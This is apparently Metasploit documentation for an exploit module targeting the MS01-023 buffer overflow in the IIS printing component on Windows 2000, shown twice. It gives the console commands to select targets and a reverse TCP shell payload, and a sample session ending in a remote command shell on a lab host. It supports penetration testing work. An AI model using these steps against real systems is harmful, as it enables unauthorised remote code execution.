documentation/modules/exploit/windows/iis/ms01_023_printer.md

## Vulnerable Application

This exploits a buffer overflow in the request processor of the
Internet Printing Protocol ISAPI module in IIS. This module
works against Windows 2000 Server and Professional SP0-SP1.

If the service stops responding after a successful compromise,
run the exploit a couple more times to completely kill the
hung process.

This module has been tested successfully on:

* Windows 2000 Professional SP0 (Dutch)
* Windows 2000 Professional SP0 (Finnish)
* Windows 2000 Professional SP0 (Greek)
* Windows 2000 Professional SP0 (Korean)
* Windows 2000 Professional SP0 (Turkish)
* Windows 2000 Professional SP1 (Arabic)
* Windows 2000 Professional SP1 (Czech)
* Windows 2000 Professional SP1 (English)
* Windows 2000 Professional SP1 (Greek)
* Windows 2000 Server SP0 (Chinese)
* Windows 2000 Server SP0 (Dutch)
* Windows 2000 Server SP0 (English)
* Windows 2000 Server SP0 (German)
* Windows 2000 Server SP0 (Hungarian)
* Windows 2000 Server SP0 (Italian)
* Windows 2000 Server SP0 (Portuguese)
* Windows 2000 Server SP0 (Spanish)
* Windows 2000 Server SP0 (Turkish)
* Windows 2000 Server SP1 (English)
* Windows 2000 Server SP1 (French)
* Windows 2000 Server SP1 (Swedish)

## Verification Steps

1. `use exploit/windows/iis/ms01_023_printer`
1. `set RHOSTS [IP]`
1. `show targets` to see the possible targets
1. `set TARGET [TARGET]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`

## Options


## Scenarios

### Windows 2000 Professional SP1 (EN)

```
msf6 > use exploit/windows/iis/ms01_023_printer
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195
rhosts => 192.168.200.195
msf6 exploit(windows/iis/ms01_023_printer) > check
[*] 192.168.200.195:80 - The target appears to be vulnerable.
msf6 exploit(windows/iis/ms01_023_printer) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP1 (Arabic)
   1   Windows 2000 SP0-SP1 (Czech)
   2   Windows 2000 SP0-SP1 (Chinese)
   3   Windows 2000 SP0-SP1 (Dutch)
   4   Windows 2000 SP0-SP1 (English)
   5   Windows 2000 SP0-SP1 (French)
   6   Windows 2000 SP0-SP1 (Finnish)
   7   Windows 2000 SP0-SP1 (German)
   8   Windows 2000 SP0-SP1 (Korean)
   9   Windows 2000 SP0-SP1 (Hungarian)
   10  Windows 2000 SP0-SP1 (Italian)
   11  Windows 2000 SP0-SP1 (Portuguese)
   12  Windows 2000 SP0-SP1 (Spanish)
   13  Windows 2000 SP0-SP1 (Swedish)
   14  Windows 2000 SP0-SP1 (Turkish)
   15  Windows 2000 Pro SP0 (Greek)
   16  Windows 2000 Pro SP1 (Greek)


msf6 exploit(windows/iis/ms01_023_printer) > set target 4
target => 4
msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_023_printer) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using target: Windows 2000 SP0-SP1 (English) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.195
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----


C:\WINNT\system32>ver
ver

Microsoft Windows 2000 [Version 5.00.2195]
```
ms01_023_printer: cleanup; use HttpClient; add additional targets 2022-07-09 01:36:10 +10:00			`## Vulnerable Application`

			`This exploits a buffer overflow in the request processor of the`
			`Internet Printing Protocol ISAPI module in IIS. This module`
			`works against Windows 2000 Server and Professional SP0-SP1.`

			`If the service stops responding after a successful compromise,`
			`run the exploit a couple more times to completely kill the`
			`hung process.`

			`This module has been tested successfully on:`

			`* Windows 2000 Professional SP0 (Dutch)`
			`* Windows 2000 Professional SP0 (Finnish)`
			`* Windows 2000 Professional SP0 (Greek)`
			`* Windows 2000 Professional SP0 (Korean)`
			`* Windows 2000 Professional SP0 (Turkish)`
			`* Windows 2000 Professional SP1 (Arabic)`
			`* Windows 2000 Professional SP1 (Czech)`
			`* Windows 2000 Professional SP1 (English)`
			`* Windows 2000 Professional SP1 (Greek)`
			`* Windows 2000 Server SP0 (Chinese)`
			`* Windows 2000 Server SP0 (Dutch)`
			`* Windows 2000 Server SP0 (English)`
			`* Windows 2000 Server SP0 (German)`
			`* Windows 2000 Server SP0 (Hungarian)`
			`* Windows 2000 Server SP0 (Italian)`
			`* Windows 2000 Server SP0 (Portuguese)`
			`* Windows 2000 Server SP0 (Spanish)`
			`* Windows 2000 Server SP0 (Turkish)`
			`* Windows 2000 Server SP1 (English)`
			`* Windows 2000 Server SP1 (French)`
			`* Windows 2000 Server SP1 (Swedish)`

			`## Verification Steps`

			1. `use exploit/windows/iis/ms01_023_printer`
			1. `set RHOSTS [IP]`
			1. `show targets` to see the possible targets
			1. `set TARGET [TARGET]`
			1. `set PAYLOAD windows/shell/reverse_tcp`
			1. `set LHOST [IP]`
			1. `run`

			`## Options`


			`## Scenarios`

			`### Windows 2000 Professional SP1 (EN)`

			```
			`msf6 > use exploit/windows/iis/ms01_023_printer`
			`[*] Using configured payload windows/shell/reverse_tcp`
			`msf6 exploit(windows/iis/ms01_023_printer) > set rhosts 192.168.200.195`
			`rhosts => 192.168.200.195`
			`msf6 exploit(windows/iis/ms01_023_printer) > check`
			`[*] 192.168.200.195:80 - The target appears to be vulnerable.`
			`msf6 exploit(windows/iis/ms01_023_printer) > show targets`

			`Exploit targets:`

			`Id Name`
			`-- ----`
			`0 Windows 2000 SP0-SP1 (Arabic)`
			`1 Windows 2000 SP0-SP1 (Czech)`
			`2 Windows 2000 SP0-SP1 (Chinese)`
			`3 Windows 2000 SP0-SP1 (Dutch)`
			`4 Windows 2000 SP0-SP1 (English)`
			`5 Windows 2000 SP0-SP1 (French)`
			`6 Windows 2000 SP0-SP1 (Finnish)`
			`7 Windows 2000 SP0-SP1 (German)`
			`8 Windows 2000 SP0-SP1 (Korean)`
			`9 Windows 2000 SP0-SP1 (Hungarian)`
			`10 Windows 2000 SP0-SP1 (Italian)`
			`11 Windows 2000 SP0-SP1 (Portuguese)`
			`12 Windows 2000 SP0-SP1 (Spanish)`
			`13 Windows 2000 SP0-SP1 (Swedish)`
			`14 Windows 2000 SP0-SP1 (Turkish)`
			`15 Windows 2000 Pro SP0 (Greek)`
			`16 Windows 2000 Pro SP1 (Greek)`


			`msf6 exploit(windows/iis/ms01_023_printer) > set target 4`
			`target => 4`
			`msf6 exploit(windows/iis/ms01_023_printer) > set payload windows/shell/reverse_tcp`
			`payload => windows/shell/reverse_tcp`
			`msf6 exploit(windows/iis/ms01_023_printer) > set lhost 192.168.200.130`
			`lhost => 192.168.200.130`
			`msf6 exploit(windows/iis/ms01_023_printer) > run`

			`[*] Started reverse TCP handler on 192.168.200.130:4444`
			`[*] Using target: Windows 2000 SP0-SP1 (English) ...`
			`[*] Encoded stage with x86/shikata_ga_nai`
			`[*] Sending encoded stage (267 bytes) to 192.168.200.195`
			`[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1168) at 2022-07-08 11:07:42 -0400`


			`Shell Banner:`
			`Microsoft Windows 2000 [Version 5.00.2195]`
			`-----`


			`C:\WINNT\system32>ver`
			`ver`

			`Microsoft Windows 2000 [Version 5.00.2195]`
			```